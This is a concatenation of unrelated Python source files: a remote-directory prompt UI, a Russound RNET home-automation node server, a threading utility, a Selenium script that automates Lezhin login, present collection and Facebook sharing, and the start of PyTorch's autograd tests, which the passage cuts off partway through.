    Publishes NEW_SUBDIRECTORIES_WALKED when a directory's listing becomes
    available and SUBDIRECTORY_WALKER_STATUS_CHANGE on busy/idle flips.
    """

    def __init__(self, exchange, get_paths_in_directory):
        self._exchange = exchange
        self._queue = Queue()  # directories waiting to be walked
        self._get_paths_in_directory = get_paths_in_directory
        self._completions_cache = {}  # directory -> listing returned by walker
        self._stop_event = threading.Event()
        self.current_status = "IDLE"
        self.start()

    def cache_completions(self, directory):
        # Enqueue for the worker thread; the result lands in the cache later.
        self._queue.put(directory)

    def get_subdirectories(self, directory):
        # None until the worker has walked (and cached) this directory.
        return self._completions_cache.get(directory)

    def start(self):
        def run():
            while not self._stop_event.is_set():
                try:
                    path = self._queue.get(timeout=0.1)
                    if path not in self._completions_cache:
                        # path has not been fetched already
                        logging.info(
                            "Retrieving completions for {}".format(path)
                        )
                        self.current_status = "BUSY"
                        self._publish_busy(path)
                        try:
                            subdirectories = self._get_paths_in_directory(path)
                            self._completions_cache[path] = subdirectories
                            self._exchange.publish(
                                RemoteDirMessages.NEW_SUBDIRECTORIES_WALKED
                            )
                        except Exception:
                            # failed walks are logged but not cached, so a
                            # later request for the same path retries
                            logging.exception(
                                "Error fetching subdirectories of {}".format(
                                    path
                                )
                            )
                except Empty:
                    # queue drained: flip back to IDLE exactly once
                    if self.current_status != "IDLE":
                        self.current_status = "IDLE"
                        self._publish_idle()
        self._thread = threading.Thread(target=run, daemon=True)
        self._thread.start()

    def _publish_busy(self, path):
        self._exchange.publish(
            RemoteDirMessages.SUBDIRECTORY_WALKER_STATUS_CHANGE, path
        )

    def _publish_idle(self):
        self._exchange.publish(
            RemoteDirMessages.SUBDIRECTORY_WALKER_STATUS_CHANGE
        )
class RemoteDirectoryPromptScreen(BaseScreen):
    """Full-screen prompt asking the user for a remote directory path.

    A text input is paired with a fuzzy-matched completion list; listings
    come from an AsyncCompleter, which fetches directories on a background
    thread and signals back via the exchange.
    """

    def __init__(self, exchange, get_paths_in_directory):
        super().__init__()
        # This screen installs its own key bindings below.
        self.use_default_bindings = False
        self._exchange = exchange
        self._input = TextArea(text="/project/", multiline=False)
        self._buffer = self._input.buffer
        # Start with the cursor at the end of the pre-filled path.
        self._buffer.cursor_position = len(self._buffer.text)
        self._completions_component = Completions()
        self._completer = AsyncCompleter(exchange, get_paths_in_directory)
        self._completer_status_component = AsyncCompleterStatus()
        # One-line reverse-video help bar pinned to the bottom.
        self._bottom_toolbar = Window(
            FormattedTextControl(
                "[tab] Enter selected directory "
                "[return] Choose selected directory "
                "[arrows] Navigation "
                "[C-c] Quit"
            ),
            height=1,
            style="reverse",
        )
        # Prompt, input field, completion list, then walker-status line.
        self._container = HSplit(
            [
                Window(height=1),
                Window(
                    FormattedTextControl(
                        "Choose directory to synchronize to on Faculty Platform: "
                    ),
                    height=1,
                ),
                self._input,
                Window(height=1),
                self._completions_component.container,
                self._completer_status_component.container,
            ]
        )
        self.main_container = HSplit(
            [VSplit([Window(width=2), self._container]), self._bottom_toolbar]
        )
        # Refresh completions every time the user edits the path.
        self._buffer.on_text_changed += self._handle_text_changed
        self.bindings = KeyBindings()

        @self.bindings.add("down")
        def _(event):
            self._completions_component.move_selection_down()

        @self.bindings.add("up")
        def _(event):
            self._completions_component.move_selection_up()

        @self.bindings.add("tab")
        def _(event):
            # Descend into the selected completion: replace the input with it
            # plus a trailing slash, cursor at the end.
            current_selection = self._completions_component.current_selection()
            if current_selection is not None:
                self._buffer.cursor_position = 0
                self._buffer.text = current_selection + "/"
                self._buffer.cursor_position = len(self._buffer.text)

        @self.bindings.add("enter")
        def _(event):
            # Hand the selected directory off for verification; may be None
            # when nothing is selected.
            current_selection = self._completions_component.current_selection()
            self._exchange.publish(
                Messages.VERIFY_REMOTE_DIRECTORY, current_selection
            )

        @self.bindings.add("c-c")
        def _(event):
            self._exchange.publish(Messages.STOP_CALLED)

        # Re-run matching when a background fetch completes, and surface
        # walker busy/idle transitions in the status component.
        self._exchange.subscribe(
            RemoteDirMessages.NEW_SUBDIRECTORIES_WALKED,
            lambda _: self._handle_text_changed(),
        )
        self._exchange.subscribe(
            RemoteDirMessages.SUBDIRECTORY_WALKER_STATUS_CHANGE,
            lambda path: self._handle_walker_status_change(path),
        )

    def on_mount(self, app):
        """Focus this screen and populate the initial completion list."""
        app.layout.focus(self.main_container)
        self._handle_text_changed()

    def _handle_text_changed(self, _=None):
        """Recompute completions for the directory part of the input.

        If the directory's listing is not cached yet, request it (the
        NEW_SUBDIRECTORIES_WALKED subscription re-invokes this handler once
        the fetch finishes); otherwise fuzzy-match the basename against the
        cached subdirectories.
        """
        current_text = self._buffer.text
        directory = os.path.dirname(current_text)
        subdirectories = self._completer.get_subdirectories(directory)
        if subdirectories is None:
            self._completer.cache_completions(directory)
        else:
            current_basename = os.path.basename(current_text)
            remote_basenames = {
                os.path.basename(os.path.normpath(subdirectory)): subdirectory
                for subdirectory in subdirectories
            }
            # cutoff=0.0 keeps even poor matches; n caps the list at 20.
            matching_basenames = difflib.get_close_matches(
                current_basename, remote_basenames.keys(), cutoff=0.0, n=20
            )
            matching_subdirectories = [
                remote_basenames[basename] for basename in matching_basenames
            ]
            # The containing directory itself is always the first entry.
            completions = [directory] + matching_subdirectories
            self._completions_component.set_completions(completions)

    def _handle_walker_status_change(self, path):
        """Reflect the completer's BUSY/IDLE state in the status line."""
        self._completer_status_component.set_status(
            self._completer.current_status, path
        )
|
russound.py | #!/usr/bin/env python3
"""
Polyglot v2 node server Russound status and control via RNET protocol
Copyright (C) 2020 Robert Paauwe
"""
try:
import polyinterface
except ImportError:
import pgc_interface as polyinterface
import sys
import time
import datetime
import requests
import threading
import socket
import math
import re
import russound_main
import node_funcs
from nodes import zone
from rnet_message import RNET_MSG_TYPE
LOGGER = polyinterface.LOGGER
@node_funcs.add_functions_as_methods(node_funcs.functions)
class Controller(polyinterface.Controller):
    """Polyglot controller node for a Russound RNET audio system.

    Opens a UDP or TCP connection to a serial-network bridge, creates one
    child node per zone, and translates incoming RNET messages into ISY
    node-driver updates.  Source on/off state is mirrored in drivers
    GV1-GV6 of this controller node.
    """
    id = 'russound'
    hint = [0,0,0,0]

    def __init__(self, polyglot):
        super(Controller, self).__init__(polyglot)
        self.name = 'Russound'
        self.address = 'rnet'
        self.primary = self.address
        self.configured = False
        self.rnet = None
        self.sock = None
        self.mesg_thread = None
        self.source_status = 0x00  # bitmap of active sources; assume all inactive
        self.params = node_funcs.NSParameters([{
            'name': 'IP Address',
            'default': 'set me',
            'isRequired': True,
            'notice': 'IP Address of serial network interface must be set',
            },
            {
            'name': 'Port',
            'default': '0',
            'isRequired': True,
            'notice': 'Serial network interface port must be set',
            },
            {
            'name': 'Network Protocol',
            'default': 'UDP',
            'isRequired': False,
            'notice': '',
            },
            {
            'name': 'Zone 1',
            'default': 'Zone 1',
            'isRequired': False,
            'notice': '',
            },
            {
            'name': 'Zone 2',
            'default': 'Zone 2',
            'isRequired': False,
            'notice': '',
            },
            {
            'name': 'Zone 3',
            'default': 'Zone 3',
            'isRequired': False,
            'notice': '',
            },
            {
            'name': 'Zone 4',
            'default': 'Zone 4',
            'isRequired': False,
            'notice': '',
            },
            {
            'name': 'Zone 5',
            'default': 'Zone 5',
            'isRequired': False,
            'notice': '',
            },
            {
            'name': 'Zone 6',
            'default': 'Zone 6',
            'isRequired': False,
            'notice': '',
            },
            ])
        self.poly.onConfig(self.process_config)

    # Process changes to customParameters
    def process_config(self, config):
        """Re-validate user parameters whenever Polyglot pushes new config."""
        (valid, changed) = self.params.update_from_polyglot(config)
        if changed and not valid:
            LOGGER.debug('-- configuration not yet valid')
            self.removeNoticesAll()
            self.params.send_notices(self)
        elif changed and valid:
            LOGGER.debug('-- configuration is valid')
            self.removeNoticesAll()
            self.configured = True
            # TODO: Run discovery/startup here?
        elif valid:
            LOGGER.debug('-- configuration not changed, but is valid')

    def start(self):
        """Connect to the Russound, build zone nodes, and start the RNET
        message-listener thread.  Does nothing until configuration is valid."""
        LOGGER.info('Starting node server')
        self.set_logging_level()
        self.check_params()
        # Open a connection to the Russound
        if self.configured:
            use_udp = self.params.get('Network Protocol') == 'UDP'
            self.rnet = russound_main.RNETConnection(
                    self.params.get('IP Address'), self.params.get('Port'), use_udp)
            self.rnet.Connect()
            self.discover()
            if self.rnet.connected:
                # Start a thread that listens for messages from the russound.
                self.mesg_thread = threading.Thread(
                        target=self.rnet.MessageLoop, args=(self.processCommand,))
                self.mesg_thread.daemon = True
                self.mesg_thread.start()
                # Query each zone's full status (0x0407), pacing the requests
                # so we don't flood the RNET bus.
                for zone_id in range(6):
                    if zone_id:
                        time.sleep(2)
                    self.rnet.get_info(zone_id, 0x0407)
            LOGGER.info('Node server started')
        else:
            LOGGER.info('Waiting for configuration to be complete')

    def longPoll(self):
        pass

    def shortPoll(self):
        pass

    def query(self):
        """Report all drivers for every node (ISY 'Query' command)."""
        for node in self.nodes:
            self.nodes[node].reportDrivers()

    def discover(self, *args, **kwargs):
        """Create the six zone child nodes.

        If a zone node already exists under a different name, delete the old
        one first so the rename from the configuration takes effect.
        """
        LOGGER.debug('in discover() - Setting up zones')
        for z in range(1, 7):
            param = 'Zone ' + str(z)
            node = zone.Zone(self, self.address, 'zone_' + str(z), self.params.get(param))
            node.setRNET(self.rnet)
            try:
                old = self.poly.getNode('zone_' + str(z))
                # Only delete when the node exists and was renamed; the old
                # code indexed a possibly-None result and logged a misleading
                # warning for brand-new zones.
                if old is not None and old['name'] != self.params.get(param):
                    self.delNode('zone_' + str(z))
                    time.sleep(1)  # give it time to remove from database
            except Exception:
                LOGGER.warning('Failed to delete node ' + param)
            self.addNode(node)
        # configuation should hold name for each zone and name for each
        # source. Here we should map the zone names to what is reported
        # by the russound and create zone nodes. When we create the
        # zone node, pass in the source name list.

    # Delete the node server from Polyglot
    def delete(self):
        LOGGER.info('Removing node server')

    def stop(self):
        LOGGER.info('Stopping node server')

    def update_profile(self, command):
        """Push the node-server profile files to the ISY."""
        st = self.poly.installprofile()
        return st

    def check_params(self):
        """Validate required parameters and post notices for missing ones."""
        self.removeNoticesAll()
        if self.params.get_from_polyglot(self):
            LOGGER.debug('All required parameters are set!')
            self.configured = True
        else:
            LOGGER.debug('Configuration required.')
            LOGGER.debug('IP Address = ' + self.params.get('IP Address'))
            LOGGER.debug('Port = ' + self.params.get('Port'))
            self.params.send_notices(self)

    def remove_notices_all(self, command):
        """ISY command handler: clear all Polyglot notices."""
        self.removeNoticesAll()

    def set_source_selection(self, state, source):
        """Mirror a source's active state onto drivers GV1-GV6.

        :param state: power byte from the zone report; 0x01 means active.
        :param source: 0-based source index.
        """
        source_map = ['GV1', 'GV2', 'GV3', 'GV4', 'GV5', 'GV6']
        # BUG FIX: the mask was computed with '1 >> source', which is 1 only
        # for source 0 and 0 for every other source, so the status bitmap was
        # never maintained correctly.  '1 << source' selects the right bit.
        bit = 1 << source
        # if state is on, set source bit else clear source bit
        if state == 0x01:
            LOGGER.info('Source ' + str(source+1) + ' is ACTIVE')
            self.source_status = self.source_status | bit
            self.reportCmd(source_map[source], 1, 25)
            self.setDriver(source_map[source], 1)
        else:
            LOGGER.info('Source ' + str(source+1) + ' is INACTIVE')
            self.source_status = self.source_status & ~bit
            self.reportCmd(source_map[source], 0, 25)
            self.setDriver(source_map[source], 0)

    def processCommand(self, msg):
        """Dispatch one incoming RNET message to the appropriate zone node
        or controller driver update.  Runs on the listener thread."""
        zone_num = msg.TargetZone() + 1
        zone_addr = 'zone_' + str(zone_num)
        # NOTE(review): target IDs >= 0x70 are "not a zone"; this compares
        # the +1 value, as the original code did — confirm the boundary.
        if zone_num >= 0x70:
            LOGGER.debug('Message target not a zone: ' + str(zone_num))
            return

        # Keypad keys that map 1:1 onto a keypress command for the source
        # zone's node.  (A duplicate, unreachable KEYPAD_NEXT branch in the
        # original elif chain has been dropped.)
        keypad_map = {
            RNET_MSG_TYPE.KEYPAD_FAV1: 'GV18',
            RNET_MSG_TYPE.KEYPAD_FAV2: 'GV19',
            RNET_MSG_TYPE.KEYPAD_PLUS: 'BRT',
            RNET_MSG_TYPE.KEYPAD_MINUS: 'DIM',
            RNET_MSG_TYPE.KEYPAD_NEXT: 'GV16',
            RNET_MSG_TYPE.KEYPAD_PREVIOUS: 'GV15',
            RNET_MSG_TYPE.KEYPAD_SOURCE: 'GV14',
            RNET_MSG_TYPE.KEYPAD_PLAY: 'GV17',
            RNET_MSG_TYPE.KEYPAD_VOL_UP: 'GV12',
            RNET_MSG_TYPE.KEYPAD_VOL_DOWN: 'GV13',
        }

        if msg.MessageType() == RNET_MSG_TYPE.ZONE_STATE:
            # It looks like the zone state is in the TS field.
            LOGGER.debug(' -> Zone %d state = 0x%x' % (msg.TargetZone(), msg.EventTS()))
            zone_addr = 'zone_' + str(msg.TargetZone() + 1)
            self.nodes[zone_addr].set_power(int(msg.EventTS()))
        elif msg.MessageType() == RNET_MSG_TYPE.ZONE_SOURCE:
            LOGGER.debug(' -> Zone %d source = 0x%x' % (zone_num, msg.MessageData()[19]+1))
            self.nodes[zone_addr].set_source(int(msg.MessageData()[19]))
        elif msg.MessageType() == RNET_MSG_TYPE.ZONE_VOLUME:
            LOGGER.debug(' -> Zone %d volume = 0x%x' % (zone_num, msg.EventData()))
            self.nodes[zone_addr].set_volume(int(msg.EventData()))
        elif msg.MessageType() == RNET_MSG_TYPE.ZONE_BASS:
            LOGGER.debug(' -> Zone %d bass = 0x%x' % (zone_num, msg.MessageData()[20]))
            self.nodes[zone_addr].set_bass(int(msg.MessageData()[20]))
        elif msg.MessageType() == RNET_MSG_TYPE.ZONE_TREBLE:
            LOGGER.debug(' -> Zone %d treble = 0x%x' % (zone_num, msg.MessageData()[20]))
            self.nodes[zone_addr].set_treble(int(msg.MessageData()[20]))
        elif msg.MessageType() == RNET_MSG_TYPE.ZONE_BALANCE:
            LOGGER.debug(' -> Zone %d balance = 0x%x' % (zone_num, msg.MessageData()[20]))
            self.nodes[zone_addr].set_balance(int(msg.MessageData()[20]))
        elif msg.MessageType() == RNET_MSG_TYPE.ZONE_LOUDNESS:
            LOGGER.debug(' -> Zone %d loudness = 0x%x' % (zone_num, msg.MessageData()[20]))
            self.nodes[zone_addr].set_loudness(int(msg.MessageData()[20]))
        elif msg.MessageType() == RNET_MSG_TYPE.ZONE_PARTY_MODE:
            LOGGER.debug(' -> Zone %d party mode = 0x%x' % (zone_num, msg.MessageData()[20]))
            self.nodes[zone_addr].set_party_mode(int(msg.MessageData()[20]))
        elif msg.MessageType() == RNET_MSG_TYPE.ZONE_DO_NOT_DISTURB:
            LOGGER.debug(' -> Zone %d do not disturb = 0x%x' % (zone_num, msg.MessageData()[20]))
            self.nodes[zone_addr].set_dnd(int(msg.MessageData()[20]))
        elif msg.MessageType() == RNET_MSG_TYPE.UPDATE_SOURCE_SELECTION:
            # The value is a bitmap of active sources.  Diff it against the
            # previous bitmap to find which sources changed state, and push
            # the new state to the matching GVn driver.
            LOGGER.debug(' -> Update Zone source 0x%x 0x%x' % (msg.MessageData()[0], msg.MessageData()[1]))
            ns = msg.MessageData()[0]
            ss = ns ^ self.source_status  # bits that changed since last time
            for source in range(6):
                bit = 1 << source
                if ss & bit:
                    LOGGER.info('Source %d changed' % (source + 1))
                    self.setDriver('GV%d' % (source + 1), 1 if ns & bit else 0)
            self.source_status = ns
        elif msg.MessageType() == RNET_MSG_TYPE.UNDOCUMENTED:
            # this seems to be the only thing we get when we select
            # a source from the keypad.
            # example:
            #    49 03 00 00 05
            #    MessageData[0] varies
            #    MessageData[1] is the source
            #    MessageData[4] is 5, does this mean source select?
            # param 0x90 is volume?
            #   event data:
            #     0x01 (01) == 2
            #     0x0c (12) == 24
            #     0x0d (13) == 26
            #     0x0e (14) == 28
            #     0x16 (22) == 44
            if msg.EventId() == 0x90:
                LOGGER.debug(' -> Volume adjusted to: ' + str(msg.EventData()))
            elif msg.MessageData()[4] == 0x05:  # source selection
                LOGGER.debug(' -> Zone {} set to source {}'.format(zone_addr, msg.MessageData()[1]+1))
                self.nodes[zone_addr].set_source(int(msg.MessageData()[1]))
            else:
                LOGGER.debug(' -> param 0x%x = 0x%x for zone %d' % (msg.EventId(), msg.EventData(), msg.EventZone()))
        elif msg.MessageType() == RNET_MSG_TYPE.ALL_ZONE_INFO:
            # Full zone snapshot: push every attribute to the zone node.
            LOGGER.info('All zone info for ' + zone_addr)
            LOGGER.debug('     ' + ' '.join('{:02x}'.format(x) for x in msg.MessageData()))
            LOGGER.info('   power state = ' + str(msg.MessageData()[0]))
            LOGGER.info('   source      = ' + str(msg.MessageData()[1] + 1))
            LOGGER.info('   volume      = ' + str(msg.MessageData()[2]))
            LOGGER.info('   bass        = ' + str(msg.MessageData()[3]))
            LOGGER.info('   treble      = ' + str(msg.MessageData()[4]))
            LOGGER.info('   loudness    = ' + str(msg.MessageData()[5]))
            LOGGER.info('   balance     = ' + str(msg.MessageData()[6]))
            LOGGER.info('   party       = ' + str(msg.MessageData()[7]))
            LOGGER.info('   dnd         = ' + str(msg.MessageData()[8]))
            self.nodes[zone_addr].set_power(int(msg.MessageData()[0]))
            self.nodes[zone_addr].set_source(int(msg.MessageData()[1]))
            self.nodes[zone_addr].set_volume(int(msg.MessageData()[2]))
            self.nodes[zone_addr].set_bass(int(msg.MessageData()[3]))
            self.nodes[zone_addr].set_treble(int(msg.MessageData()[4]))
            self.nodes[zone_addr].set_loudness(int(msg.MessageData()[5]))
            self.nodes[zone_addr].set_balance(int(msg.MessageData()[6]))
            self.nodes[zone_addr].set_party_mode(int(msg.MessageData()[7]))
            self.nodes[zone_addr].set_dnd(int(msg.MessageData()[8]))
            self.set_source_selection(msg.MessageData()[0], msg.MessageData()[1])
        elif msg.MessageType() == RNET_MSG_TYPE.KEYPAD_POWER:
            # The power key is special. We'd like it to send either DON or DOF
            # depending on what state we'll be moving into.
            zone_addr = 'zone_' + str(msg.SourceZone() + 1)
            if self.nodes[zone_addr].get_power():
                self.nodes[zone_addr].keypress('DOF')
            else:
                self.nodes[zone_addr].keypress('DON')
        elif msg.MessageType() in keypad_map:
            # Simple keypad keys: forward the mapped command to the zone that
            # originated the keypress.
            zone_addr = 'zone_' + str(msg.SourceZone() + 1)
            self.nodes[zone_addr].keypress(keypad_map[msg.MessageType()])
        elif msg.MessageType() == RNET_MSG_TYPE.UNKNOWN_SET:
            # don't think we really care about these
            LOGGER.debug('US -> ' + ' '.join('{:02x}'.format(x) for x in msg.MessageRaw()))
        else:
            LOGGER.debug(' -> TODO: message id ' + str(msg.MessageType().name) + ' not yet implemented.')
        # Do we care about keypad events? Maybe in the sense that we'd
        # like to create a program that is something like:
        #   if zone keypress == Next then do something
        # which means we need a node driver that holds the last keypress value.

    def set_logging_level(self, level=None):
        """Set the LOGGER level.

        Called with level=None at startup (restores the saved level,
        defaulting to DEBUG/10), or with {'value': n} when invoked as the
        DEBUG node command.
        """
        if level is None:
            try:
                level = self.get_saved_log_level()
            except Exception:
                LOGGER.error('set_logging_level: get saved level failed.')
            if level is None:
                level = 10  # logging.DEBUG
            level = int(level)
        else:
            level = int(level['value'])
        self.save_log_level(level)
        LOGGER.info('set_logging_level: Setting log level to %d' % level)
        LOGGER.setLevel(level)

    # ISY command name -> handler method.
    commands = {
            'UPDATE_PROFILE': update_profile,
            'REMOVE_NOTICES_ALL': remove_notices_all,
            'DEBUG': set_logging_level,
            }

    # For this node server, all of the info is available in the single
    # controller node.
    drivers = [
            {'driver': 'ST', 'value': 1, 'uom': 2},   # node server status
            {'driver': 'GV1', 'value': 0, 'uom': 25}, # source 1 On/off status
            {'driver': 'GV2', 'value': 0, 'uom': 25}, # source 2 On/off status
            {'driver': 'GV3', 'value': 0, 'uom': 25}, # source 3 On/off status
            {'driver': 'GV4', 'value': 0, 'uom': 25}, # source 4 On/off status
            {'driver': 'GV5', 'value': 0, 'uom': 25}, # source 5 On/off status
            {'driver': 'GV6', 'value': 0, 'uom': 25}, # source 6 On/off status
            ]
|
AsynchronousThreading.py | """
"""
import threading
from UsefulTools.UtilsFunctions import pt
import traceback
import json
def object_to_json(object, attributes_to_delete=None):
    """Serialize `object` to a sorted, indented JSON string.

    The object's attribute dict is obtained via `class_properties` and used
    as the serialized form (json.dumps falls back to `default` because the
    object itself is not natively serializable).

    :param attributes_to_delete: String set with all attributes' names to
        delete from properties method.
    :return: sorted, 4-space-indented JSON string.
    :raises ValueError: on any serialization failure (after logging it).
    """
    try:
        properties = class_properties(
            object=object, attributes_to_delete=attributes_to_delete
        )
        serialized = json.dumps(
            object, default=lambda _unused: properties, sort_keys=True, indent=4
        )
    except Exception as error:
        pt(error)
        pt(traceback.print_exc())
        raise ValueError("STOP")
    return serialized
def execute_asynchronous_thread(functions, arguments=None, kwargs=None):
    """Run `functions` asynchronously on background thread(s).

    :param functions: a callable (or list of callables) to execute.
    :param arguments: positional-argument tuple passed to the callable(s).
    :param kwargs: keyword-argument dict passed to the callable(s).
    :return: the `Thread` wrapper, so callers can keep a reference
        (previously the wrapper was created and immediately discarded).
    """
    return Thread(functions=functions, arguments=arguments, kwargs=kwargs)
class Thread():
    """Launch one callable — or a list of callables — on background threads.

    Each callable is started immediately on its own `threading.Thread`,
    named after the callable, with the shared `arguments`/`kwargs`.
    """

    def __init__(self, functions, arguments=None, kwargs=None):
        # BUG FIX: a list of functions used to hit a bare `pass` and was
        # silently ignored; now every callable in the list is launched.
        if isinstance(functions, list):
            for function_def in functions:
                self._execute_process(function_def=function_def,
                                      arguments=arguments, kwargs=kwargs)
        else:
            self._execute_process(function_def=functions,
                                  arguments=arguments, kwargs=kwargs)

    def __check_type__(self, object):
        """Return type(object).  Kept for backward compatibility."""
        return type(object)

    def _execute_process(self, function_def, arguments=None, kwargs=None):
        """Start `function_def` on a new thread named after the function."""
        if not arguments:
            arguments = ()
        # A plain string can be passed purely to name the thread.
        if isinstance(function_def, str):
            name = function_def
        else:
            name = function_def.__name__
        process = threading.Thread(name=name, target=function_def,
                                   args=arguments, kwargs=kwargs)
        process.start()
def class_properties(object, attributes_to_delete=None):
    """Return a shallow copy of `object.__dict__`.

    :param attributes_to_delete: represents which attribute set must be
        deleted.  NOTE(review): currently unused by this implementation —
        the full dict copy is returned as-is; confirm intended behavior.
    :return: a copy of object.__dict__, so the caller cannot mutate the
        object's real attribute dict.
    """
    pt("object", object)
    return object.__dict__.copy()
__init__.py | from selenium import webdriver
from JupJup import Login, Present, Share
from JupJup import config
from multiprocessing import Process
import time
class CoinJupJupManager:
    """Drives two periodic Lezhin automation jobs (present collection and
    Facebook sharing), each in its own process with its own PhantomJS
    browser session."""

    def __init__(self):
        self.data = config.USERDATA

    def start(self):
        """Spawn both periodic jobs as separate processes."""
        p_collect = Process(target=self.collect_task)
        p_share = Process(target=self.share_task)
        p_collect.start()
        p_share.start()

    def _run_periodic(self, make_worker, do_work, period):
        """Shared login/act/reset loop for both jobs.

        The two original task methods were copy-paste duplicates differing
        only in the worker object, the work step, and the repeat period.

        :param make_worker: callable(driver) -> worker object for the job.
        :param do_work: callable(driver, worker) performing one round.
        :param period: seconds between rounds.
        """
        driver = webdriver.PhantomJS()
        login = Login.factory.LoginFactory.login_class(config.LOGIN_METHOD, driver, self.data)
        worker = make_worker(driver)
        last_run_at = time.time()
        round_done = False
        while True:
            if not round_done:
                driver.maximize_window()
                self.attend(driver, login)
                do_work(driver, worker)
                self.reset(driver)
                round_done = True
            # Re-arm once the period has elapsed since the last round.
            if time.time() - last_run_at > period:
                last_run_at = time.time()
                round_done = False
            time.sleep(config.WORK_PERIOD)

    def collect_task(self):
        """Collect presents every COLLECT_PERIOD seconds (runs forever)."""
        self._run_periodic(
            lambda driver: Present.collector.PresentCollector(driver),
            self.collect_presents,
            config.COLLECT_PERIOD,
        )

    def share_task(self):
        """Share on Facebook every SHARE_PERIOD seconds (runs forever)."""
        self._run_periodic(
            lambda driver: Share.share_facebook.ShareFacebook(driver),
            self.share_lezhin,
            config.SHARE_PERIOD,
        )

    def attend(self, driver, login):
        """Open the Lezhin front page and log in (attendance check-in)."""
        print('attend start')
        driver.get('https://www.lezhin.com/ko')
        time.sleep(config.WAIT_LONG)
        login.do_work()
        print('attend finish')

    def collect_presents(self, driver, collector):
        """Open the presents page and collect everything available."""
        print('present collect start')
        driver.get('https://www.lezhin.com/ko/present')
        time.sleep(config.WAIT_LONG)
        collector.collect_all()
        print('present collect finish')

    def share_lezhin(self, driver, share):
        """Open the invite page and perform the Facebook share."""
        print('share lezhin start')
        driver.get('https://www.lezhin.com/ko/payment#invite')
        time.sleep(config.WAIT_LONG)
        share.do_work()
        time.sleep(config.WAIT_LONG)
        print('share lezhin finish')

    def reset(self, driver):
        """Return to the front page and clear session state."""
        driver.get('https://www.lezhin.com/ko')
        #delete cookies to ensure that naver login process is always same
        driver.delete_all_cookies()
|
test_autograd.py | import gc
import sys
import io
import math
import random
import tempfile
import time
import threading
import unittest
import warnings
from copy import deepcopy
from collections import OrderedDict
from itertools import product, permutations
from operator import mul
from functools import reduce, partial
import torch
from torch import nn
from torch._six import inf, nan
from torch.autograd.function import once_differentiable
from torch.autograd.profiler import (profile, format_time, EventList,
FunctionEvent, FunctionEventAvg,
record_function, emit_nvtx)
import torch.autograd.functional as autogradF
from torch.utils.checkpoint import checkpoint
from torch.testing._internal.common_cuda import TEST_CUDA
from torch.testing._internal.common_utils import (TestCase, run_tests, skipIfNoLapack,
suppress_warnings, slowTest,
load_tests,
IS_WINDOWS, IS_MACOS, CudaMemoryLeakCheck,
TEST_WITH_ROCM, disable_gc,
gradcheck, gradgradcheck, make_tensor)
from torch.autograd import Variable, Function, detect_anomaly, kineto_available
from torch.autograd.function import InplaceFunction
import torch.autograd.forward_ad as fwAD
from torch.testing import randn_like
from torch.testing._internal.common_methods_invocations import (
unpack_variables,
mask_not_all_zeros,
S)
from torch.testing._internal.common_device_type import (instantiate_device_type_tests, skipCUDAIfRocm,
onlyCPU, onlyCUDA, onlyOnCPUAndCUDA, dtypes, dtypesIfCUDA,
deviceCountAtLeast, skipCUDAIfCudnnVersionLessThan,
skipCUDAIf, skipMeta)
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
import pickle
PRECISION = 1e-4
def graph_desc(fn):
    """Render an autograd graph rooted at `fn` as a nested string.

    Example: ``AddBackward(AccumulateGrad(), None)``; a None node renders
    as the literal string ``'None'``.
    """
    if fn is None:
        return 'None'
    children = [graph_desc(child_fn) for child_fn, _ in fn.next_functions]
    return '{}({})'.format(type(fn).__name__, ', '.join(children))
class TestAutograd(TestCase):
    def test_tensor_grad_warnings(self):
        """Accessing .grad warns on non-leaf tensors, but not on leaves or
        on non-leaves that called retain_grad()."""
        dummy = torch.empty(1)

        with warnings.catch_warnings(record=True) as w:
            # Accessing .grad on leaf
            dummy.requires_grad_()
            foo = dummy.grad
            self.assertEqual(len(w), 0)

            # Accessing .grad on non-leaf
            dummy = dummy.clone()
            foo = dummy.grad
            self.assertEqual(len(w), 1)

            # Accessing .grad on non-leaf that retains gradients
            dummy.retain_grad()
            foo = dummy.grad
            self.assertEqual(len(w), 1)
    def _function_test(self, cls):
        """Shared driver for custom-Function tests: runs cls.apply on two
        5x5 inputs with create_graph=True and checks both gradients and
        that grad-of-grad graphs were built.  Returns the inputs."""
        x = torch.randn(5, 5, requires_grad=True)
        y = torch.randn(5, 5, requires_grad=True)
        result = cls.apply(x, 2, y)
        go = torch.ones((), requires_grad=True)
        result.sum().backward(go, create_graph=True)

        # Expected grads follow from forward = x + 2*y + x*y.
        self.assertEqual(x.grad, y + torch.ones(5, 5))
        self.assertEqual(y.grad, x + torch.ones(5, 5) * 2)
        # create_graph=True means the grads themselves have grad_fns.
        self.assertIsNotNone(x.grad.grad_fn)
        self.assertIsNotNone(y.grad.grad_fn)

        return x, y
    def test_function(self):
        """A basic custom Function with saved tensors and a non-tensor
        scalar arg produces correct grads and expected backward graphs."""
        class MyFunction(Function):

            @staticmethod
            def forward(ctx, tensor1, pyscalar, tensor2):
                ctx.pyscalar = pyscalar
                ctx.save_for_backward(tensor1, tensor2)
                return tensor1 + pyscalar * tensor2 + tensor1 * tensor2

            @staticmethod
            def backward(ctx, grad_output):
                var1, var2 = ctx.saved_tensors
                # NOTE: self is the test case here
                self.assertIsInstance(var1, torch.Tensor)
                self.assertIsInstance(var2, torch.Tensor)
                self.assertIsInstance(grad_output, torch.Tensor)
                return (grad_output + grad_output * var2, None,
                        grad_output * ctx.pyscalar + grad_output * var1)

        x, y = self._function_test(MyFunction)

        # Compare the grad graphs against recorded expected descriptions.
        x_grad_desc = graph_desc(x.grad.grad_fn)
        y_grad_desc = graph_desc(y.grad.grad_fn)
        self.assertExpected(x_grad_desc, "x_grad_desc")
        self.assertExpected(y_grad_desc, "y_grad_desc")
    def test_once_differentiable(self):
        """@once_differentiable backward runs with grad disabled and leaves
        Error nodes (not a differentiable graph) in the grad's graph."""
        class MyFunction(Function):

            @staticmethod
            def forward(ctx, tensor1, pyscalar, tensor2):
                ctx.pyscalar = pyscalar
                ctx.save_for_backward(tensor1, tensor2)
                return tensor1 + pyscalar * tensor2 + tensor1 * tensor2

            @staticmethod
            @once_differentiable
            def backward(ctx, grad_output):
                # once_differentiable must disable grad inside backward.
                self.assertFalse(torch.is_grad_enabled())
                t1, t2 = ctx.saved_tensors
                return (grad_output + grad_output * t2, None,
                        grad_output * ctx.pyscalar + grad_output * t1)

        x, y = self._function_test(MyFunction)
        self.assertEqual(graph_desc(x.grad.grad_fn),
                         'CopyBackwards(None, Error(AccumulateGrad(), None, AccumulateGrad()))')
        self.assertEqual(graph_desc(y.grad.grad_fn),
